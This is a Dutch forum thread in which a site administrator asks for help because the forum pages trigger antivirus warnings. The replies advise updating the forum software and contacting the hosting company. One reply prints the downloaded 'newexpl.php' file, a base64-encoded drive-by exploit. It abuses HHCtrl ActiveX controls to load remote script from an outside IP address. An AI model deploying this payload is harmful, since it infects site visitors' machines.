virus in homepage

Status
Niet open voor verdere reacties.

misantroop

Gebruiker
Lid geworden
12 nov 2002
Hallo,
Ik ben beheerder van de site www.narcolepsieforum.nl
[modbreak]
Let op, een ieder die deze site bezoekt loopt een mogelijk risico op besmetting. Het is nu voldoende duidelijk dat op de forum pagina van de site zich een virus bevind. Dus link volgen op eigen risico!!!!!!
[/modbreak]

Als gebruikers het forumgedeelte openen krijgen ze een virusmelding.
Ik als beheerder kan niet vinden hoe ik dat virus kan verwijderen.
Iemand een idee?

Alvast bedankt!

Laatst bewerkt door een moderator:
inderdaad zonealarm geeft hier ook diverse meldingen
ik zie wel trouwens dat je forumsoftware al gedateerd is, ik raad je aan om een backup van de sql database te maken en je forum te upgraden naar de laatste versie, vaak zitten er in oudere fora beveiligingslekken die gedicht worden met upgrades.
daarna even de backup terug zetten en kijken of het probleem dan over is

Ik denk niet dat het een virus is, als ik op »Forum« klik dan krijg ik de melding of ik iets wil downloaden. (dus dat zal het probleem denk ik zijn:rolleyes:) Zie bijlage wat ik voor mijn neus krijg. Ook kan ik het niet meer afsluiten,

Browser: Opera

Ik zal nog even kijken of het met IE ook zo is!

Edit
Nee, met IE heb ik er geen last van. Maar Jheroen heeft misschien de oplossing

Bijlagen

• newexpl.jpg
    newexpl.jpg
    19,2 KB · Weergaven: 54
Laatst bewerkt:
Bij het openen van die site wil mijn browser "newexpl.php" gaan downloaden.

Upload dit bestand eens opnieuw en controleer even of je dit nergens oproept?

Mijn Kaspersky piept ook over een gevaarlijk script... Lijkt me niet helemaal ok.
Volgens mij worden die door een applet gestart??

Avast vind het ook niet zo'n goed idee het forum te bezoeken. :confused:

Bijlagen

• afbeelding1.gif
    afbeelding1.gif
    11,4 KB · Weergaven: 41
Geplaatst door Admin_Frisian
Avast vind het ook niet zo'n goed idee het forum te bezoeken. :confused:

Er is geen reden tot paniek :D:D:D:D.

Nah, zal ik ook maar even dan:

Bijlagen

• kav.jpg
    kav.jpg
    22,2 KB · Weergaven: 46
Bitdefender vindt het ook niet zo'n goed idee.

In Firefox krijg ik een virusmelding.

Als ik er via Internet Explorer heen ga krijg ik er een stuk of 10 met allemaal een verschillende melding.

De melding die Bitdefender gaf via Firefox is trouwens niet te vinden op google. Geen resultaten. Heel raar:confused:

Ok; we weten nu dat het "bad" is maar heeft iemand een oplossing voor misantroop??

:o

Wat Jheroen in het eerste antwoord al aanraadt: forumsoftware updaten.
Of misschien andere forum-software installeren.

Guus.

Geplaatst door XP_PC
Ok; we weten nu dat het "bad"
Volgens norton niet:confused:

Ik heb het bestandje even met kladblok geopent maar ik wordt er niet wijzer uit.
Dit staat er in kladblok:
From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwvL0VOIj4KPEhUTUw+PEJPRFk+CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZSIgY2xhc3NpZD0iY2xzaWQ6YWRiODgwYTYtZDhmZi0xMWNmLTkzNzctMDBhYTAwM2I3YTExIj4KPFBBUkFNIG5hbWU9IkNvbW1hbmQiIHZhbHVlPSJSZWxhdGVkIFRvcGljcywgTUVOVSI+CjxQQVJBTSBuYW1lPSJCdXR0b24iIHZhbHVlPSJUZXh0Ol8iPgo8UEFSQU0gbmFtZT0iV2luZG93IiB2YWx1ZT0iJGdsb2JhbF9ibGFuayI+CjxQQVJBTSBuYW1lPSJJdGVtMSIgdmFsdWU9ImNvbW1hbmQ7bXMtaXRzOmM6L3dpbmRvd3MvaGVscC9udHNoYXJlZC5jaG06Oi9hbHRfdXJsX2VudGVycHJpc2Vfc3BlY2lmaWMuaHRtIj4KPC9PQkpFQ1Q+CjxPQkpFQ1Qgc3R5bGU9ImRpc3BsYXk6bm9uZSIgaWQ9ImFzZHF3ZXIiIGNsYXNzaWQ9ImNsc2lkOmFkYjg4MGE2LWQ4ZmYtMTFjZi05Mzc3LTAwYWEwMDNiN2ExMSI+CjxQQVJBTSBuYW1lPSJDb21tYW5kIiB2YWx1ZT0iUmVsYXRlZCBUb3BpY3MsIE1FTlUiPgo8UEFSQU0gbmFtZT0iQnV0dG9uIiB2YWx1ZT0iVGV4dDpfIj4KPFBBUkFNIG5hbWU9IldpbmRvdyIgdmFsdWU9IiRnbG9iYWxfYmxhbmsiPgo8UEFSQU0gbmFtZT0iSXRlbTEiIHZhbHVlPSdjb21tYW5kOyBqYXZhc2NyaXB0OmV4ZWNTY3JpcHQoImRvY3VtZW50LndyaXRlKFwiPHNjcmlwdCBzcmM9aHR0cDovLzE5NS45NS4yMTguMTczL2RsL2Fkdjc4Mi9KUVRtdWRJLmpwZ1wiK1N0cmluZy5mcm9tQ2hhckNvZGUoNjIpK1wiPC9zY3JcIitcImlwdFwiK1N0cmluZy5mcm9tQ2hhckNvZGUoNjIpKSIpJz4KPC9PQkpFQ1Q+CjxzY3JpcHQ+YXNkcXdlLkhIQ2xpY2soKTtzZXRUaW1lb3V0KCJhc2Rxd2VyLkhIQ2xpY2soKSIsMTAwKTtzZXRUaW1lb3V0KCJkb2N1bWVudC53cml0ZSgnJykiLDIwMCk8L3NjcmlwdD48L0JPRFk+PC9IVE1MPg==

Misschien dat jullie er iets meer kunnen:confused:

Het zou best wel is kunnen dat Jheroen gelijk heeft.

Laatst bewerkt door een moderator:
Norton geeft een hele boel trojans ed.. Een voorbeeldje.

Bijlagen

• screenhunter_006.gif
    screenhunter_006.gif
    15,3 KB · Weergaven: 42
Je hebt waarschijnlijk een worm op de server op gelopen of iemand anders die dezelfde server gebruikt , je kunt het best het hosting bedrijf contacteren
het zoekt naar bepaalde forum software met bugs in
(rond de kerstperiode is dit gedaan met phpbb forums)
heb jij cpanel of een ander paneel voor adminstratie op je forum ? daarin bevind zich meestal een virusscanner

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan